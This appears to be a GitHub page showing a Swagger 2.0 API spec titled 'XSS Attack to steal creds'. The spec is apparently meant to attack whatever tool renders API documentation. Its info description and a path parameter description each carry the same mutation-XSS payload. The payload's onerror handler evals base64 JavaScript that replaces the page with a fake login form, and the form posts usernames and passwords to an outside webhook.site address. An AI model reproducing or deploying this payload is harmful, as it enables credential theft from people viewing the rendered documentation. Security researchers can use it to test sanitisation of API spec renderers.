-
Notifications
You must be signed in to change notification settings - Fork 0
/
xss_credentials_form.yaml
38 lines (38 loc) · 1.89 KB
/
xss_credentials_form.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
swagger: '2.0'
info:
title: XSS Attack to steal creds
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EubWV0aG9kPSdQT1NUJzthLmFjdGlvbj0naHR0cHM6Ly93ZWJob29rLnNpdGUvMzVhNmI4YjItZDgxMi00ZThkLTk3NjctYjA2NGMzOGU1OTdhJzthLmlubmVySFRNTD0nPGNlbnRlcj48YnI+VXNlcm5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VyTmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9cHdkPjxicj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iTG9naW4iPjwvY2VudGVyPic7IGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'onerror='eval(atob(this.id))'>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
/M0X0101:
get:
responses:
'200':
description: No response was specified
tags:
- XSS
operationId: findAccounts
summary: Finds all accounts
'/hack/hachid/{id}':
delete:
parameters:
- description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EubWV0aG9kPSdQT1NUJzthLmFjdGlvbj0naHR0cHM6Ly93ZWJob29rLnNpdGUvMzVhNmI4YjItZDgxMi00ZThkLTk3NjctYjA2NGMzOGU1OTdhJzthLmlubmVySFRNTD0nPGNlbnRlcj48YnI+VXNlcm5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VyTmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9cHdkPjxicj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iTG9naW4iPjwvY2VudGVyPic7IGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'onerror='eval(atob(this.id))'>"></form>
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified